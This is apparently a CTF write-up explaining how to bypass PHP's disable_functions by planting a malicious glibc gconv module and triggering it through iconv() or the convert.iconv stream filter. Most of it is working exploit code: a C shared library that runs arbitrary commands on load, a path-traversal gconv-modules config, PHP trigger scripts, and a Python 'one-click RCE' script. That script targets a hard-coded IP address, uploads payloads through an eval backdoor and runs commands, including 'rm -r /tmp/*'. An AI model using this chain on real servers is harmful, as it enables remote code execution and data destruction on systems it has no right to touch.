# bypass disable_functions with iconv ## env * default `ubuntu18.04` docker images with php installed (glibc-based: the trick relies on glibc's `GCONV_PATH` module loading, so musl-based images such as Alpine are not affected). * arbitrary php code execution (here a `backdoor` parameter that evaluates PHP) while `putenv()` is not disabled, and `iconv()` or the `convert.iconv.*` stream filter is still usable. * a writable directory (`/tmp` here) to drop the module configuration and the shared library. * docker environment: https://github.com/baiyecha404/CTFWEBchallenge/blob/master/bytectf2020/wallbreaker2020 ## exploit upload the gconv module configuration file `gconv-modules` to `/tmp` (the module path is resolved relative to the `GCONV_PATH` directory, hence the `../` chain back to `/tmp/payload`; glibc appends `.so`, which is why the config says `payload` rather than `payload.so`): ``` module PAYLOAD// INTERNAL ../../../../../../../../tmp/payload 2 module INTERNAL PAYLOAD// ../../../../../../../../tmp/payload 2 ``` upload the dynamic library `payload.so` to `/tmp` (`payload.c -> payload.so`): ```bash gcc payload.c -o payload.so -shared -fPIC ``` payload.c ```c #include <stdio.h> #include <stdlib.h> void gconv() {} void gconv_init() { const char* cmdline = getenv("EVIL_CMDLINE"); system(cmdline); exit(0); } ``` execute exp.php: ```php <?php putenv("GCONV_PATH=/tmp"); putenv("EVIL_CMDLINE=echo $(id) > /tmp/res"); iconv("payload", "UTF-8", "whatever"); ``` Done. Note that `gconv_init()` calls `exit(0)` right after `system()`, so the PHP worker terminates and the request returns no body; the command output is read from `/tmp/res` afterwards (add `2>&1` inside the command if stderr is wanted as well). ## alternatives when `iconv()` is also disabled, you can use a php stream filter to bypass it. 
Simply replacing the `iconv()` call with the following code gets the job done (the `convert.iconv.*` filter goes through the same gconv module loading, so the `GCONV_PATH` and `gconv-modules` setup above is unchanged): ```php $fp = fopen('php://output', 'w'); stream_filter_append($fp, 'convert.iconv.payload.utf-8'); fwrite($fp, "byc_404"); fclose($fp); ``` ## script "one-click" rce The `include('/tmp/exp.php')` request below is wrapped in `try/except` because `gconv_init()` ends the worker with `exit(0)` before a response is sent; also note that `rce()` splices `cmd` verbatim into the PHP source, so a command containing `"` or a `$name` sequence would alter the generated PHP string and needs escaping. ```python # coding: utf-8 # -**- author: byc_404 -**- import requests from base64 import b64encode as b64 url = 'http://120.27.246.202:8200/' payload_so = """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""" gconv_modules="""module PAYLOAD// INTERNAL ../../../../../../../../tmp/payload 2\nmodule INTERNAL PAYLOAD// ../../../../../../../../tmp/payload 2""" exp="""<?php putenv("GCONV_PATH=/tmp"); putenv("EVIL_CMDLINE=echo $(%s) > /tmp/res"); iconv("payload", "UTF-8", "byc_404"); """ # use it when iconv() is disabled exp_alternatives ="""<?php putenv("GCONV_PATH=/tmp"); putenv("EVIL_CMDLINE=echo $(%s) > /tmp/res"); $fp = fopen('php://output', 'w'); stream_filter_append($fp, 'convert.iconv.payload.utf-8'); fwrite($fp, "byc_404"); fclose($fp); """ def upload_so(): r = requests.post(url, data={'backdoor': """file_put_contents('/tmp/payload.so',base64_decode('%s'));echo 'OK';""" % payload_so}) if 'OK' not in r.text: return "[-] Upload payload.so Failed" return "[+] Successfully upload payload.so" def upload_gconv_modules(): r = requests.post(url, data={'backdoor': "file_put_contents('/tmp/gconv-modules','%s');echo 'OK';" % gconv_modules}) if 'OK' not in r.text: return "[-] Upload gconv_modules Failed" return "[+] Successfully upload gconv-modules" def rce(cmd): r = requests.post(url, data={'backdoor': "file_put_contents('/tmp/exp.php',base64_decode('%s'));echo 'OK';" % b64((exp_alternatives % cmd).encode()).decode()}) if 'OK' not in r.text: return "[-] Upload exp.php Failed" print("[+] Successfully upload exp.php") try: requests.post(url, data={"backdoor": "include('/tmp/exp.php');"}) except: pass r = requests.post(url, data={"backdoor": "include('/tmp/res');unlink('/tmp/res');"}) return r.text def main(): print(upload_so()) 
print(upload_gconv_modules()) print(rce('id'),rce('rm -r /tmp/*')) if __name__ == '__main__': main() ``` Note that the second `rce()` call wipes `/tmp`, which also deletes `payload.so`, `gconv-modules` and `exp.php`, so the upload steps must be repeated before running further commands. ## references https://gist.github.com/LoadLow/90b60bd5535d6c3927bb24d5f9955b80 https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/